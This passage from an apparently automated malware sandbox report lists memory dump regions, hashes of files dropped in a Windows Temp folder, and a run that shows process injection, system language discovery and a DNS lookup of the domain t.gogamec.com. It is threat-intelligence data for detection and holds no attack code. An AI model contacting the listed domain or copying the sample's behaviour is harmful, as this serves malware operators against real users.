| SHA512 | c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff |
memory/1084-77-0x0000000004EF0000-0x0000000005518000-memory.dmp
memory/3952-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3952-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3952-68-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3952-67-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3952-64-0x0000000064941000-0x000000006494F000-memory.dmp
memory/3952-63-0x0000000000C70000-0x0000000000CFF000-memory.dmp
memory/3952-62-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/3952-58-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/1084-101-0x0000000005790000-0x00000000057F6000-memory.dmp
memory/1084-99-0x0000000005620000-0x0000000005642000-memory.dmp
memory/3824-104-0x0000000000560000-0x00000000005C8000-memory.dmp
memory/1084-100-0x0000000005720000-0x0000000005786000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h4yl2515.joc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1084-111-0x0000000005800000-0x0000000005B54000-memory.dmp
memory/672-110-0x0000000000290000-0x00000000002AA000-memory.dmp
memory/3824-112-0x0000000004E00000-0x0000000004E76000-memory.dmp
memory/672-115-0x0000000000A50000-0x0000000000A56000-memory.dmp
memory/3824-114-0x0000000004DA0000-0x0000000004DBE000-memory.dmp
memory/3824-125-0x0000000005620000-0x0000000005BC4000-memory.dmp
memory/1084-126-0x0000000005C60000-0x0000000005C7E000-memory.dmp
memory/116-127-0x00000000066C0000-0x000000000670C000-memory.dmp
memory/1428-129-0x0000000000400000-0x0000000000883000-memory.dmp
memory/672-130-0x000000001B1D0000-0x000000001B2D2000-memory.dmp
memory/3952-140-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3952-139-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3952-138-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3952-137-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3952-135-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/3952-131-0x0000000000400000-0x000000000051B000-memory.dmp
memory/116-151-0x0000000007140000-0x0000000007172000-memory.dmp
memory/116-152-0x000000006D1B0000-0x000000006D1FC000-memory.dmp
memory/116-163-0x0000000007420000-0x00000000074C3000-memory.dmp
memory/116-162-0x0000000006760000-0x000000000677E000-memory.dmp
memory/1084-164-0x000000006D1B0000-0x000000006D1FC000-memory.dmp
memory/1064-178-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1064-182-0x0000000005240000-0x000000000534A000-memory.dmp
memory/116-181-0x0000000007B50000-0x00000000081CA000-memory.dmp
memory/1064-184-0x0000000005170000-0x00000000051AC000-memory.dmp
memory/116-183-0x00000000071F0000-0x000000000720A000-memory.dmp
memory/1064-180-0x0000000005110000-0x0000000005122000-memory.dmp
memory/1064-179-0x0000000005630000-0x0000000005C48000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat062000ca9aa6.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/1084-185-0x0000000007000000-0x000000000700A000-memory.dmp
memory/116-186-0x0000000007720000-0x00000000077B6000-memory.dmp
memory/116-187-0x00000000076B0000-0x00000000076C1000-memory.dmp
memory/116-208-0x00000000076E0000-0x00000000076EE000-memory.dmp
memory/116-209-0x00000000076F0000-0x0000000007704000-memory.dmp
memory/116-210-0x00000000077E0000-0x00000000077FA000-memory.dmp
memory/1084-211-0x00000000072A0000-0x00000000072A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ScMeAP.SU
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
C:\Users\Admin\AppData\Local\Temp\20L2vNO.2
| MD5 | 4bf3493517977a637789c23464a58e06 |
| SHA1 | 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4 |
| SHA256 | ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831 |
| SHA512 | 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7727e238bcfe2e321072500c68ed0d20 |
| SHA1 | dfb774b29dd1621bb8b24fbcc699bae37002e899 |
| SHA256 | 74d126fa51a276db01dfaf47941be9aea660552c61cd1dfbf43a6159102b72dd |
| SHA512 | 2b09f87dcd1291bc347b07fb325eed7a7d79e79d6c1cf106ef12a5d415ceef84385b3233998de167a6eb0e07e3927da1a31bfc8d0f1eba84d5bdf329b1ab8484 |
C:\Users\Admin\AppData\Local\Temp\ykifDQA.1
| MD5 | 7b25b2318e896fa8f9a99f635c146c9b |
| SHA1 | 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2 |
| SHA256 | 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89 |
| SHA512 | a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6 |
C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0
| MD5 | 6c83f0423cd52d999b9ad47b78ba0c6a |
| SHA1 | 1f32cbf5fdaca123d32012cbc8cb4165e1474a04 |
| SHA256 | 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae |
| SHA512 | e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec |
C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh
| MD5 | 973c9cf42285ae79a7a0766a1e70def4 |
| SHA1 | 4ab15952cbc69555102f42e290ae87d1d778c418 |
| SHA256 | 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968 |
| SHA512 | 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85 |
C:\Users\Admin\AppData\Local\Temp\6h87pfZ.4
| MD5 | 243a3d5a63c4d0f3a18a3d340f50ed8d |
| SHA1 | 4b5d7d91fdc7666d131ef4ed7524bdc1b024a009 |
| SHA256 | 4da1a700d1dd30fa025a3682aa490680099d508a0b64fbdf8bac2f92914628a1 |
| SHA512 | 64cd601f218c7ace06dd62ad41faf58d829b77f221fa444d2e347f52fa03210584f75448416e4910a0bb2058aafb8aaadcc9e9ea5c353cb29c352c23c6532ab1 |
C:\Users\Admin\AppData\Local\Temp\FdKD47Ef.i1
| MD5 | 22e51c0e8d96e09cf8571ef2a4f91cfb |
| SHA1 | 46f3a3ad48c540816c110c67b8eab824ebeec8c1 |
| SHA256 | e296a4b63a6561115cab7809fb27eb85d3db864d59ecbce82b784d52572a83f1 |
| SHA512 | 40e328acf47cbf6754b29b856e6a17e6cc15cf9b11b9e58b267fb26b14d598e71cefa266b43f552d51d81dca712e5024a77ca09fb1535ae54cb8586e8b5ccc7f |
C:\Users\Admin\AppData\Local\Temp\BtDIj1.fYl
| MD5 | d17564f93bb4a4cf11c46726ea1fe74b |
| SHA1 | 84cbff97ff148296bf36898dcf640ad18eb317c9 |
| SHA256 | 96a4ccf3bc2092c2198cad0beb6a6fdc26db7f59bb82bf4e476bbac6fc783ce0 |
| SHA512 | f327cac0e017ebdaa87e1a8ed40d3abfa5a7614250a9759d6ae62f0f7149aa8ee4a26bb74854ef3860ae8911d87b55803d1f4c0fd58d19507ac4b91eebbb48ff |
C:\Users\Admin\AppData\Local\Temp\Q_tW.pL
| MD5 | 40ba2d6fcce0565f8d90055a8fb9975b |
| SHA1 | c7529fea938658e19d238200af795533cba13c5c |
| SHA256 | df403d434bdcc3b3604349310c62ca68718f1388a3d9c6155e026ff685b555b6 |
| SHA512 | fd8dd7936d96952acaba5f96ff6116b17bc79f770b324945ba966b00e6b3ff6c9f6388bd402d3e5ad40d42a37123416fe904a7d15c749585593caecfcf46b816 |
C:\Users\Admin\AppData\Local\Temp\jB946RB.I7A
| MD5 | d4c89c7cabd256ccedd701e27b3fc31a |
| SHA1 | c01e95b983215b9a08c807084185dbd17ccd32aa |
| SHA256 | e7fe376512c6ba9b615d492961ef38a27b14d192b7c9751b75d9004370b5266c |
| SHA512 | 1d3d59c17368f3e264241fc5100971b74487d0bdc0e7902081a332314fdc59e07475f1aaeed17cd2bc1f64c59378ebe1b76e83ea046351d6691c647a60cbb421 |
C:\Users\Admin\AppData\Local\Temp\U56d.r
| MD5 | 4d5164bd007e1af1a6b436b89fc98329 |
| SHA1 | 808e5215729cff6daf37bfcac7af29e8959a7c26 |
| SHA256 | eaeb79cf3f2e99906d1b5f89b92fcb5555117f0a527247b5becbc78cf65cc434 |
| SHA512 | f977ced0b42db76bab7d79d35f6dad56bdbbde527ccde0f8810838d5364b89223f9ec673915ac9b0f595bad7251d3d17d1be479c8ed5bf56c19aac8470a6b668 |
memory/1432-238-0x0000000002280000-0x0000000002482000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XHnbBPN.0kM
| MD5 | ab06b4a2368530bea1f4a24f7a4042a0 |
| SHA1 | 4d2f5c0c585eca9589b726d17528d2eb7e8da3bf |
| SHA256 | e53029f24e2d1bf07cac3ba80aad1a0cbff995e2cdc1c32cb74a43a5e8f3fe6e |
| SHA512 | 3ad8acdbca7839f7f1c6ce404a767dd8d3cd0d43a8b98100387c5f8e6cf7f5ab6a08fb6a7456a5beea73ab693cbf4e0def91e601d57b1be9dc865de34f65007f |
C:\Users\Admin\AppData\Local\Temp\r6f7sE.I
| MD5 | bd3523387b577979a0d86ff911f97f8b |
| SHA1 | 1f90298142a27ec55118317ee63609664bcecb45 |
| SHA256 | a7e608f98f06260044d545f7279b8f859f7b7af98ac2b2b79a3cd7ac3b2dac36 |
| SHA512 | b37cb8daddb526312f6be439a3cb87fe62b69d44866df708f10eb148455f09f90b0dcee4360c1ae332d3936357fd4c474920aebec5aa8ddb005b617356c3d286 |
memory/1028-242-0x0000000000400000-0x000000000089B000-memory.dmp
memory/1432-246-0x0000000002B20000-0x0000000002BC5000-memory.dmp
memory/1432-250-0x0000000002BD0000-0x0000000002C62000-memory.dmp
memory/1432-247-0x0000000002BD0000-0x0000000002C62000-memory.dmp
memory/4536-252-0x0000000000400000-0x000000000054C000-memory.dmp
memory/1432-251-0x0000000002280000-0x0000000002482000-memory.dmp
memory/4536-253-0x0000000003090000-0x0000000003135000-memory.dmp
memory/4536-257-0x0000000003140000-0x00000000031D2000-memory.dmp
memory/4536-255-0x0000000003140000-0x00000000031D2000-memory.dmp
memory/1908-258-0x0000000000400000-0x000000000054C000-memory.dmp
memory/1908-264-0x0000000003630000-0x00000000036D5000-memory.dmp
memory/1908-269-0x00000000036E0000-0x0000000003772000-memory.dmp
memory/1908-266-0x00000000036E0000-0x0000000003772000-memory.dmp
memory/1432-275-0x0000000002BD0000-0x0000000002C62000-memory.dmp
memory/4536-282-0x0000000003140000-0x00000000031D2000-memory.dmp
memory/2272-287-0x0000000000400000-0x000000000054C000-memory.dmp
memory/1908-288-0x00000000036E0000-0x0000000003772000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20241010-en
Max time kernel
151s
Max time network
160s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe"
C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe
"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe" -u
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | t.gogamec.com | udp |